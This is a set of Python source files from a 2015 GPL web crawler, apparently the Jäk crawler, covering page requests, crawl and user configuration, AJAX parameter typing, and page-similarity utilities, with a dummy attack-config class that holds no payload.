85 |         self.assertEqual(url.scheme, "http")
86 |         self.assertEqual(len(url.parameters), 2)
87 |         self.assertEqual(url.get_values_to_parameter("a")[0], "7")
88 |         self.assertEqual(url.get_values_to_parameter("b")[0], "abc123")
89 | 
90 |         with self.assertRaises(KeyError):
91 |             url.get_values_to_parameter("zzz")
92 | 
93 | 
94 | 
95 | if __name__ == '__main__':
96 |     unittest.main()
97 | 


--------------------------------------------------------------------------------
/crawler/utils/__init__.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''


--------------------------------------------------------------------------------
/crawler/utils/asyncrequesthandler.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | import logging
18 | from models.asyncrequeststructure import AsyncRequestStructure
19 | from models.parametertype import ParameterType
20 | from utils.utils import calculate_new_parameter_type
21 | 
22 | 
23 | 
24 | class AsyncRequestHandler():
25 | 
26 |     def __init__(self, database_manager):
27 |         self.database_manager = database_manager
28 | 
29 |     def handle_requests(self, web_page):
30 |         for async_request in web_page.ajax_requests + web_page.timing_requests:
31 |             request_hash = async_request.request_hash
32 |             ajax_structure = self.database_manager.get_asyncrequest_structure(request_hash)
33 |             if ajax_structure is None:
34 |                 new_parameters = {}
35 |                 parameters = async_request.parameters
36 |                 try:
37 |                     for key, value in parameters.items():
38 |                         param_type = calculate_new_parameter_type(None, value)
39 |                         new_parameters[key] = {"parameter_type": param_type.value}
40 |                     async_request.request_structure = AsyncRequestStructure(request_hash, new_parameters)
41 |                 except AttributeError:
42 |                     async_request.request_structure = AsyncRequestStructure(request_hash, None)
43 |             else:
44 |                 new_parameters = {}
45 |                 if async_request.parameters is not None:
46 |                    try:
47 |                         for key, value in async_request.parameters.items():
48 |                             param_type = calculate_new_parameter_type(ParameterType(ajax_structure.parameters[key]['parameter_type']), value)
49 |                             new_parameters[key] = {"parameter_type": param_type.value}
50 |                         async_request.request_structure = AsyncRequestStructure(request_hash, new_parameters)
51 |                    except AttributeError:
52 |                        logging.error("AttributeError with request: {}, Key: {}, Value: {}".format(request_hash, key, value))
53 |                        async_request.request_structure = ajax_structure
54 |                    except KeyError:
55 |                        logging.debug("KeyError with request: {}, Key: {}, Value: {}".format(request_hash, key, value))
56 |                        async_request.request_structure = ajax_structure
57 |                 else:
58 |                     async_request.request_structure = ajax_structure
59 |         return web_page
60 | 
61 | 
62 | 
63 | 
64 | 


--------------------------------------------------------------------------------
/crawler/utils/config.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | 
17 | This class contains everything that is important for a crawl session:
18 |     - name
19 |     - start_page - is the start page, where the crawler should start
20 |     - max_depth - How deep the crawler should go
21 |     - max_click_depth - How deep a crawler should click
22 |     - speed - interaction speed between Jäk and JS
23 | 
24 | '''
25 | from models.utils import CrawlSpeed
26 | 
27 | class CrawlConfig():
28 |     
29 |     def __init__(self, name, start_page, max_depth = 5, max_click_depth = 5, crawl_speed=CrawlSpeed.Medium):
30 |         self.name = name
31 |         self.max_depth = max_depth
32 |         self.max_click_depth = max_click_depth
33 |         self.start_page_url = start_page
34 |         self.process_speed = crawl_speed
35 | 
36 | 
37 | 
38 | class AttackConfig():
39 |     """
40 |     Right now more a dummy than something usefull
41 |     """
42 |     def __init__(self, start_page_url, crawl_speed=CrawlSpeed.Medium):
43 |         attack = "XSS"
44 |         self.start_page_url = start_page_url
45 |         self.process_speed = crawl_speed
46 | 
47 | 


--------------------------------------------------------------------------------
/crawler/utils/execptions.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | class LoginFormNotFound(Exception):
19 |     def __init__(self, value):
20 |         self.value = value     
21 |     def __str__(self):
22 |         return repr(self.value)
23 |     
24 | class PageNotFound(Exception):
25 |     def __init__(self, value):
26 |         self.value = value     
27 |     def __str__(self):
28 |         return repr(self.value)
29 |     
30 | class LoginFailed(Exception):
31 |     def __init__(self, value):
32 |         self.value = value     
33 |     def __str__(self):
34 |         return repr(self.value)
35 |      
36 | class ElementNotFound(Exception):
37 |     def __init__(self, value):
38 |         self.value = value     
39 |     def __str__(self):
40 |         return repr(self.value)
41 |     
42 | class DomainHandlerNotSet(Exception):
43 |     def __init__(self, value):
44 |         self.value = value     
45 |     def __str__(self):
46 |         return repr(self.value)  
47 |     


--------------------------------------------------------------------------------
/crawler/utils/requestor.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | from time import time, sleep
19 | import logging
20 | 
21 | from PyQt5.Qt import QEventLoop, QTimer, QUrl
22 | 
23 | from core.interactioncore import InteractionCore
24 | from models.utils import CrawlSpeed
25 | 
26 | 
27 | class Requestor(InteractionCore):
28 |     def __init__(self, parent, proxy, port, crawl_speed = CrawlSpeed.Medium):
29 |         super(Requestor, self).__init__(parent, proxy, port, crawl_speed)
30 |         self.app = parent.app
31 | 
32 |     def _loadFinished(self, resutl):
33 |         #logging.debug("{} Subframes found".format(self.mainFrame().childFrames()))
34 |         #logging.debug(self.mainFrame().toHtml())
35 |         pass
36 |         
37 |     def get(self, qurl, html=None, num_retries=1, delay = 10, timeout = 10):
38 |         t1 = time()
39 |         
40 |         loop = QEventLoop()
41 |         timer = QTimer()
42 |         timer.setSingleShot(True)
43 |         timer.timeout.connect(loop.quit)
44 |         self.loadFinished.connect(loop.quit)
45 |         if qurl:
46 |             if html:
47 |                 self.setHtml(html, qurl)
48 |             else: 
49 |                 self.mainFrame().load(QUrl(qurl))
50 |         timer.start(timeout * 1000)
51 |         loop.exec_() # delay here until download finished or timeout
52 |     
53 |         if timer.isActive():
54 |             # downloaded successfully
55 |             timer.stop()
56 |             self._wait(delay - (time() - t1))
57 |             parsed_html = self.mainFrame().toHtml()
58 |         else:
59 |             # did not download in time
60 |             if num_retries > 0:
61 |                 logging.debug('Timeout - retrying')
62 |                 parsed_html = self.get(qurl, num_retries=num_retries-1, timerout=timeout, delay=delay)
63 |             else:
64 |                 logging.debug('Timed out')
65 |                 parsed_html = ''
66 |         self.mainFrame().setHtml(None)
67 |         return parsed_html
68 |     
69 |     def _wait(self, timeout=1, pattern=None):
70 |         """Wait for delay time
71 |         """
72 |         deadline = time() + timeout
73 |         while time() < deadline:
74 |             sleep(0)
75 |             self.app.processEvents()
76 |       
77 |     def javaScriptConsoleMessage(self, message, lineNumber, sourceID):
78 |         logging.debug("Console: " + message + " at: " + str(lineNumber))
79 |         
80 |     def __del__(self):
81 |         pass


--------------------------------------------------------------------------------
/crawler/utils/user.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | 
17 | 
18 | This class contains everything, that is important for a user. It specifies, mainly the login behaviour.
19 | Notice: A crawl session(one config) can have multiple users
20 |     - username - for identifying later the user
21 |     - user_level - can be interesting for later comparison for different views
22 |     - url_with_login_form - what can that be??
23 |     - login_data = dict, that contains mainly username and password
24 | 
25 | '''
26 | 
27 | import uuid
28 | 
29 | 
30 | class User():
31 |     
32 |     def __init__(self, username,  user_level, url_with_login_form=None, login_data=None, session=uuid.uuid4()):
33 |         self.login_data = login_data
34 |         self.username = username
35 |         self.url_with_login_form = url_with_login_form
36 |         self.user_level = user_level
37 |         self.session = session


--------------------------------------------------------------------------------
/crawler/utils/utils.py:
--------------------------------------------------------------------------------
  1 | '''
  2 | Copyright (C) 2015 Constantin Tschuertz
  3 | 
  4 | This program is free software: you can redistribute it and/or modify
  5 | it under the terms of the GNU General Public License as published by
  6 | the Free Software Foundation, either version 3 of the License, or
  7 | any later version.
  8 | 
  9 | This program is distributed in the hope that it will be useful,
 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 12 | GNU General Public License for more details.
 13 | 
 14 | You should have received a copy of the GNU General Public License
 15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
 16 | '''
 17 | 
 18 | 
 19 | import logging
 20 | import string
 21 | from Cython.Compiler.Options import normalise_encoding_name
 22 | from PyQt5.QtCore import QUrl
 23 | from PyQt5.QtNetwork import QNetworkCookie
 24 | 
 25 | from models.deltapage import DeltaPage
 26 | from models.parametertype import ParameterType
 27 | 
 28 | 
 29 | def form_to_dict(form, key_values = None):
 30 |     result = {}
 31 |     QStr
 32 |     for elem in form.parameter:
 33 |         if elem.name == "redirect_to": 
 34 |             continue
 35 |         if elem.name not in key_values:
 36 |             result[elem.name] = elem.values
 37 |         else: 
 38 |             result[elem.name] = key_values[elem.name]    
 39 |     return result
 40 |              
 41 | 
 42 | #substract the page-parameters in the parent-class from the delta-class
 43 | def subtract_parent_from_delta_page(parent_page, delta_page):
 44 |     result = DeltaPage(delta_page.id, delta_page.url, delta_page.html, cookiesjar=delta_page.cookiejar, depth=delta_page.current_depth, generator=delta_page.generator, parent_id=delta_page.parent_id)
 45 |     result.delta_depth = delta_page.delta_depth
 46 |     for link in delta_page.links:
 47 |         if link not in parent_page.links:
 48 |             result.links.append(link)
 49 |         
 50 |     for d_clickable in delta_page.clickables:
 51 |         clickable_is_already_in_main = False
 52 |         for m_clickable in parent_page.clickables:
 53 |             if d_clickable == m_clickable:
 54 |                 clickable_is_already_in_main = True
 55 |                 break
 56 |         if clickable_is_already_in_main == False:
 57 |                 result.clickables.append(d_clickable)
 58 |     
 59 |     for d_form in delta_page.forms:
 60 |         form_is_already_in_main = False
 61 |         for m_form in parent_page.forms:
 62 |             if two_forms_are_equal(d_form, m_form):
 63 |                 form_is_already_in_main = True
 64 |                 break
 65 |         if form_is_already_in_main == False:
 66 |             result.forms.append(d_form)
 67 | 
 68 |     result.ajax_requests = delta_page.ajax_requests # They are just capturing the new one
 69 |     return result
 70 |     
 71 | def transfer_clicked_from_parent_to_delta(parent_page, delta_page):
 72 |     for d_clickabe in delta_page.clickables:
 73 |         if not d_clickabe.clicked:
 74 |             for p_clickable in parent_page.clickables:
 75 |                 if d_clickabe == p_clickable:
 76 |                     d_clickabe.clicked = p_clickable.clicked # If both are equel, transfer the clickstate from parent to child
 77 | 
 78 |     return delta_page
 79 | 
 80 | def calculate_similarity_between_pages(page1, page2, clickable_weight = 1.0, form_weight = 1.0, link_weight = 1.0, verbose= True):
 81 | 
 82 |     if page1.toString() == page2.toString():
 83 |         return 1.0
 84 | 
 85 |     form_similarity = 0.0
 86 |     identical_forms = 0.0
 87 |     form_counter = len(page1.forms) + len(page2.forms)
 88 |     if form_counter > 0:
 89 |         for p1_form in page1.forms:
 90 |             is_in_other = False
 91 |             for p2_form in page2.forms:
 92 |                 if two_forms_are_equal(p1_form, p2_form):
 93 |                     is_in_other = True
 94 |                     break
 95 |             if is_in_other:
 96 |                 identical_forms += 1.0
 97 |                 form_counter -= 1.0
 98 |         form_similarity = identical_forms / form_counter
 99 |     else:
100 |         form_weight = 0.0
101 | 
102 |     link_similarity = 0.0
103 |     identical_links = 0.0
104 |     link_counter = len(page1.links) + len(page2.links)
105 |     if link_counter > 0:
106 |         for p1_link in page1.links:
107 |             is_in_other = False
108 |             for p2_link in page2.links:
109 |                 if p1_link.url.abstract_url == p2_link.url.abstract_url:
110 |                     is_in_other = True
111 |                     break
112 |             if is_in_other:
113 |                 identical_links += 1.0
114 |                 link_counter -= 1.0
115 |         link_similarity = identical_links / link_counter
116 |     else:
117 |         #logging.debug("Linkweight is 0.0")
118 |         link_weight = 0.0
119 | 
120 |     clickable_similarity = 0.0
121 |     identical_clickables = 0.0
122 |     clickable_counter = len(page1.clickables) + len(page2.clickables)
123 |     if clickable_counter > 0:
124 |         for p1_clickable in page1.clickables:
125 |             is_in_other = False
126 |             for p2_clickable in page2.clickables:
127 |                 if two_clickables_are_equal(p1_clickable, p2_clickable):
128 |                     is_in_other = True
129 |                     break
130 |             if is_in_other:
131 |                 identical_clickables += 1.0
132 |                 clickable_counter -= 1.0
133 |         clickable_similarity = identical_clickables / clickable_counter
134 |     else:
135 |         clickable_weight = 0
136 | 
137 |     sum_weight = clickable_weight + form_weight + link_weight
138 |     similarity= clickable_weight * clickable_similarity + form_weight * form_similarity + link_weight * link_similarity
139 |     if sum_weight > 0:
140 |         result = similarity / sum_weight
141 |     else:
142 |         result = 1
143 |     if verbose:
144 |         f = open("similarities/" + str(page1.id) + " - " + str(page2.id) + ".txt", "w")
145 |         f.write(page1.toString())
146 |         f.write(" \n \n ======================================================= \n \n")
147 |         f.write(page2.toString())
148 |         f.write("\n \n ====================Result=========================== \n \n")
149 |         f.write("Similarity = " + str(result) + " - Formsimilarity: " + str(form_similarity) + " - Linksimilarity: " + str(link_similarity) + " - Clickablesimilarity: " + str(clickable_similarity))
150 |         f.write("\n Formweight: "+ str(form_weight) + " Formnum: " +str(form_counter) + " - Linkweight: " + str(link_weight) + " Linknum: " + str(link_counter) + " - Clickableweight: " + str(clickable_weight) + " Clickablenum: " + str(clickable_counter) )
151 |         f.close()
152 |         #logging.debug("PageID: " + str(page1.id) + " and PageID: " + str(page2.id) + " has a similarity from: " + str(result))
153 | 
154 |     return result
155 | 
156 | def two_clickables_are_equal(c1, c2):
157 |     tmp = c1.event == c2.event and c1.dom_address == c2.dom_address and c1.tag == c2.tag
158 |     if c1.clickable_type is not None and c2.clickable_type is not None:
159 |         tmp = tmp and c1.clickable_type == c2.clickable_type
160 |     return tmp
161 | 
162 | def two_forms_are_equal(form1, form2):
163 |     return form1.form_hash == form2.form_hash and form1.action.abstract_url == form2.action.abstract_url
164 | 
165 | def count_cookies(networkaccess_manager, url):
166 |     try:
167 |         url = url.toString()
168 |     except AttributeError:
169 |         url = url
170 |     cookiejar = networkaccess_manager.cookieJar()
171 |     all_cookies = cookiejar.cookiesForUrl(QUrl(url))
172 |     return len(all_cookies)
173 | 
174 | 
175 | 
176 | def calculate_new_parameter_type(current_type, value):
177 |         if current_type is None: # When we see it the first time, then we just set this param to None
178 |             if len(value) == 1:
179 |                 if value in string.ascii_lowercase + string.ascii_uppercase + "/":
180 |                     return ParameterType.Char
181 |                 elif _is_int(value):
182 |                     return ParameterType.Digit
183 |                 elif _is_float(value):
184 |                     return ParameterType.Float
185 |                 else:
186 |                     raise ValueError("Len is one but I have not specified a case for: {}".format(value))
187 |             else:
188 |                 if _is_int(value):
189 |                     return ParameterType.Integer
190 |                 elif _is_float(value):
191 |                     return ParameterType.Float
192 |                 elif isinstance(value, str):
193 |                     if _has_number(value):
194 |                         return ParameterType.AlphaNumerical
195 |                     else:
196 |                         return ParameterType.String
197 |                 else:
198 |                     raise ValueError("Is ling but not specified...")
199 | 
200 |         else:
201 |             if current_type == ParameterType.Digit:
202 |                 return _handle_digit(value)
203 |             elif current_type == ParameterType.Float:
204 |                 return _handle_float(value)
205 |             elif current_type == ParameterType.Char:
206 |                 return _handle_char(value)
207 |             elif current_type == ParameterType.Integer:
208 |                 return _handle_integer(value)
209 |             elif current_type == ParameterType.String:
210 |                 return _handle_string(value)
211 |             else:
212 |                 return ParameterType.AlphaNumerical # One time alphanumerical everytime alphanumerical
213 | 
214 | 
215 | def _is_int(value):
216 |     try:
217 |         int(value)
218 |         return True
219 |     except ValueError:
220 |         return False
221 | 
222 | def _is_float(value):
223 |     try:
224 |         float(value)
225 |         return True
226 |     except ValueError:
227 |         return False
228 | 
229 | def _has_number(input):
230 |     return any(_is_int(char) or _is_float(char) for char in input)
231 | 
232 | def _handle_digit(value):
233 |     if len(value) == 1:
234 |         if _is_int(value):
235 |             return ParameterType.Digit
236 |         if _is_float(value):
237 |             return ParameterType.Float
238 |         if value in string.ascii_uppercase + string.ascii_lowercase:
239 |             return ParameterType.Char
240 |     else:
241 |         if _is_int(value):
242 |             return ParameterType.Integer
243 |         if _is_float(value):
244 |             return ParameterType.Float
245 |         else:
246 |             return ParameterType.AlphaNumerical
247 | 
248 | def _handle_float(value):
249 |     if _is_float(value) or _is_int(value):
250 |             return ParameterType.Float
251 |     if isinstance(value, str):
252 |         return ParameterType.AlphaNumerical
253 |     else:
254 |         raise  ValueError("{}".format(value))
255 | 
256 | 
257 | def _handle_char(value):
258 |     if len(value) == 1:
259 |         return ParameterType.Char
260 |     else:
261 |         return ParameterType.AlphaNumerical
262 | 
263 | def _handle_integer(value):
264 |     if _is_int(value):
265 |         return ParameterType.Integer
266 |     elif _is_float(value):
267 |         return ParameterType.Float
268 |     else:
269 |         return ParameterType.AlphaNumerical
270 | 
271 | def _handle_string(value):
272 |     if _has_number(value):
273 |         return ParameterType.AlphaNumerical
274 |     else:
275 |         return ParameterType.String
276 | 
277 | def print_to_file(self, item, filename):
278 |     f = open("result/"+filename, "w")
279 |     f.write(item)
280 |     f.close()


--------------------------------------------------------------------------------